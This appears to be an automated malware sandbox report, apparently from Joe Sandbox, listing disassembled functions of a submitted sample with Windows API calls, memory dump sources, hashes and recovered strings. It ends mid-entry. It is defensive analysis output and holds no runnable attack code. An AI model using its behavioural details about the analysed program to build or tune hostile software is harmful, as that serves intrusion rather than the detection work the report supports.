                                                            • Opcode Fuzzy Hash: 2abeb3227514848965cecfed513d09e14f751ac58b4da2e43df2f17255cc4405
                                                            • Instruction Fuzzy Hash: 4F110476905708BFDB019FA8AC08A9B7FACEB45321F18426AFC24D3350D675D90487B0
                                                            Function 00D28202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D2821E
                                                            • GetLastError.KERNEL32(?,00D27CE2,?,?,?), ref: 00D28228
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00D27CE2,?,?,?), ref: 00D28237
                                                            • HeapAlloc.KERNEL32(00000000,?,00D27CE2,?,?,?), ref: 00D2823E
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D28255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: f2d13b0e29bc4ae66ba86b9aa1cf8fb6274ce8b30a2090e5535aac1b6a3cc78b
                                                            • Instruction ID: 1b8094806a2c9301971bbb9734e72930c84964ef0230bb5d22afc49d6ea93e93
                                                            • Opcode Fuzzy Hash: f2d13b0e29bc4ae66ba86b9aa1cf8fb6274ce8b30a2090e5535aac1b6a3cc78b
                                                            • Instruction Fuzzy Hash: EF016D71202714FFDB204FA5EC48D6B7BACEF9A759B500469FC49C7220DA318C00DA70
                                                            Function 00D2710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?,?,00D27455), ref: 00D27127
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D27142
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D27150
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?), ref: 00D27160
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D2716C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: 039dcac53e2dec63a02489b7c53203e8f4d873d6d5b0c6aca1450565017bb644
                                                            • Instruction ID: af0ce41b491c624e63557bedbdcb53ec5cb0bf6e87025b9680c079b2514b841c
                                                            • Opcode Fuzzy Hash: 039dcac53e2dec63a02489b7c53203e8f4d873d6d5b0c6aca1450565017bb644
                                                            • Instruction Fuzzy Hash: 60017CB2A01324ABDB224F64EC44AAA7BADEF54796F141064FD08D6320D731DD509BB0
                                                            Function 00D35244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D35260
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D3526E
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D35276
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D35280
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 40754043a65d93bd683a34186a0968be4d5a011989ed0943ae4f43558a37816d
                                                            • Instruction ID: 157bea23f6019258dd3a2f2d397748d7958ceb41a81b97715579e4a64310460b
                                                            • Opcode Fuzzy Hash: 40754043a65d93bd683a34186a0968be4d5a011989ed0943ae4f43558a37816d
                                                            • Instruction Fuzzy Hash: 02011735D01B19DBCF00EFE4E849AEEBB78FB09712F400556E985F6294CB7095508BB9
                                                            Function 00D2810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D28121
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D2812B
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D2813A
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D28141
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D28157
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: a33b22ed12a327f1fdcf1ea8e9833e35d29ad50ab311e44156e3fd5286e7e984
                                                            • Instruction ID: 73e6cbf9040a1815fb3d5a6a8f9447e44fdb5497690e14b777af160591b9b240
                                                            • Opcode Fuzzy Hash: a33b22ed12a327f1fdcf1ea8e9833e35d29ad50ab311e44156e3fd5286e7e984
                                                            • Instruction Fuzzy Hash: D6F06871201324AFEB110F65EC8DE673BACFF55759B040025F985C7290CF619D51DA70
                                                            Function 00D2C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00D2C1F7
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D2C20E
                                                            • MessageBeep.USER32(00000000), ref: 00D2C226
                                                            • KillTimer.USER32(?,0000040A), ref: 00D2C242
                                                            • EndDialog.USER32(?,00000001), ref: 00D2C25C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 8c88fbb75a37bb55695564ef5508b4c99e139408f9a88c9a2a7e5cafb5cab145
                                                            • Instruction ID: 9c49aedb87ebc170fe8c80fca4e2739b71ab13aeaa1f8053ded9a9e591509592
                                                            • Opcode Fuzzy Hash: 8c88fbb75a37bb55695564ef5508b4c99e139408f9a88c9a2a7e5cafb5cab145
                                                            • Instruction Fuzzy Hash: 3B01A730414314A7EB206B60ED4EF9677B8FF10707F040269A982D55E0DBF0AD449BA4
                                                            Function 00CD13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 00CD13BF
                                                            • StrokeAndFillPath.GDI32(?,?,00D0B888,00000000,?), ref: 00CD13DB
                                                            • SelectObject.GDI32(?,00000000), ref: 00CD13EE
                                                            • DeleteObject.GDI32 ref: 00CD1401
                                                            • StrokePath.GDI32(?), ref: 00CD141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: b478984878634940cfc2ec5034c1c939987879006bbc88f872cc21683f9d1f5f
                                                            • Instruction ID: 31d6bc36f153daf80b1827f0646e02b7b1bd7278b470f354eaed7f16388459cf
                                                            • Opcode Fuzzy Hash: b478984878634940cfc2ec5034c1c939987879006bbc88f872cc21683f9d1f5f
                                                            • Instruction Fuzzy Hash: 6DF0C930005B08EBDB125F2AEC4C7583BA5A701326F4C8236E929C93F5C7318995DF60
                                                            Function 00CE2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CF0DB6: std::exception::exception.LIBCMT ref: 00CF0DEC
                                                              • Part of subcall function 00CF0DB6: __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00CD7A51: _memmove.LIBCMT ref: 00CD7AAB
                                                            • __swprintf.LIBCMT ref: 00CE2ECD
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00CE2D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: d63e4f45db6ee4f65be5d1c03e7347e942efadffc45a4f4550475e4d39182dfb
                                                            • Instruction ID: 43164cc1fa48980ad7ead999b328aed51f3d11262b3081fd04cbfc311258eb6b
                                                            • Opcode Fuzzy Hash: d63e4f45db6ee4f65be5d1c03e7347e942efadffc45a4f4550475e4d39182dfb
                                                            • Instruction Fuzzy Hash: 59919C71108251AFC714EF28D885DBFB7A8EF85710F04091EF5959B2A1EB30EE44EB62
                                                            Function 00D3B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                            • CoInitialize.OLE32(00000000), ref: 00D3B9BB
                                                            • CoCreateInstance.OLE32(00D62D6C,00000000,00000001,00D62BDC,?), ref: 00D3B9D4
                                                            • CoUninitialize.OLE32 ref: 00D3B9F1
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: ac3accc78016b3a9a29058f28deec1c0e2f4867015c2bdcdecd742b77f90eeff
                                                            • Instruction ID: 3ac2b35b81cfadf0bd1436e5a53a478ea3b0bd1d3198d4e7848e6f9f72d9d1fc
                                                            • Opcode Fuzzy Hash: ac3accc78016b3a9a29058f28deec1c0e2f4867015c2bdcdecd742b77f90eeff
                                                            • Instruction Fuzzy Hash: 49A167756043059FCB10DF14C884D2ABBE5FF89724F04899AF9999B3A1CB31EC46CBA1
                                                            Function 00CF501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 00CF50AD
                                                              • Part of subcall function 00D000F0: __87except.LIBCMT ref: 00D0012B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: 63166b043d155388f962ceb7593b210c340bf46b36f31ab47f8dd58e8f630906
                                                            • Instruction ID: 7526570653ccd2f6d19073ef0a997b45532c0e0f3a16efd2dc8b9bd2f46af871
                                                            • Opcode Fuzzy Hash: 63166b043d155388f962ceb7593b210c340bf46b36f31ab47f8dd58e8f630906
                                                            • Instruction Fuzzy Hash: EC515871A08B0AA6DB516724C90137E2F94DB40700F248D59E7E9C63E9EE748EC49AB7
                                                            Function 00CE6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: ERCP
                                                            • API String ID: 2532777613-1384759551
                                                            • Opcode ID: 791c2259b61274b181b17a53ad1d780031abf586ebf444dbb2c5a8d0ada6b057
                                                            • Instruction ID: e701fb0846bdd54c5bcb54fe5120f35856be293ccce4d0a3080d52b4edd3d677
                                                            • Opcode Fuzzy Hash: 791c2259b61274b181b17a53ad1d780031abf586ebf444dbb2c5a8d0ada6b057
                                                            • Instruction Fuzzy Hash: 6251F271900709DFDB24CF66C881BAABBF4EF14344F24856EE99ADB251E770EA40CB50
                                                            Function 00D57946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D5F910,00000000,?,?,?,?), ref: 00D579DF
                                                            • GetWindowLongW.USER32 ref: 00D579FC
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D57A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 1e69a003a5a5ff4d26742ee8da8918f25017a8e69f0ecdb249d3b2bba26f788d
                                                            • Instruction ID: befb76314c32f87c4c26d74c5087cfda67a18fcf566aa3c97fbe4a733f27baf9
                                                            • Opcode Fuzzy Hash: 1e69a003a5a5ff4d26742ee8da8918f25017a8e69f0ecdb249d3b2bba26f788d
                                                            • Instruction Fuzzy Hash: DF31BC31204206ABDF118F38EC45BEA77A9EB09325F284725FD79E22E0D730E9549B70
                                                            Function 00D573D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D57461
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D57475
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D57499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 285e8f9fc5261af8388c9236f32e1a12ae4d028a3ac4958d6aff48171ddcda37
                                                            • Instruction ID: 8b12a7637dbddaf6776b0cc9112ce7f5d98f8c7021a53730c316f2e432b78d2f
                                                            • Opcode Fuzzy Hash: 285e8f9fc5261af8388c9236f32e1a12ae4d028a3ac4958d6aff48171ddcda37
                                                            • Instruction Fuzzy Hash: FB21BF32600218AFDF118FA4DC42FEA3B6AEB48725F150214FE55AB190DA75AC55DBB0
                                                            Function 00D57B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00D57C4A
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00D57C58
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D57C5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            • Opcode ID: 1e25207f58f69897dd1a626699f60afb6081ea6a09832d328934fd49c92323ba
                                                            • Instruction ID: f9497e5ed75316c4e296d92e80ea1a68d9b6e130120ac098c9e8c24ba6ef81fe
                                                            • Opcode Fuzzy Hash: 1e25207f58f69897dd1a626699f60afb6081ea6a09832d328934fd49c92323ba
                                                            • Instruction Fuzzy Hash: 01215AB1604208AFDB11DF28ECC1DB637ACEB4A3A5B240059FE119B3A1CA31EC058B70
                                                            Function 00D56CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D56D3B
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D56D4B
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D56D70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 71fa316ed93dae216347762fbcc2fd73ce488770b6e3ba6eb14592e1deab1eab
                                                            • Instruction ID: 70184a6f19e5762947c0d68d69803bbf5b51706bb1f31641b26c593dcdf95d0c
                                                            • Opcode Fuzzy Hash: 71fa316ed93dae216347762fbcc2fd73ce488770b6e3ba6eb14592e1deab1eab
                                                            • Instruction Fuzzy Hash: 9021B032600218BFDF128F54CC45EBB3BBAEB89761F458125FE459B1A0CA71DC558BB0
                                                            Function 00D28C4B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D28C6D
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D28C84
                                                            • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00D28CBC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
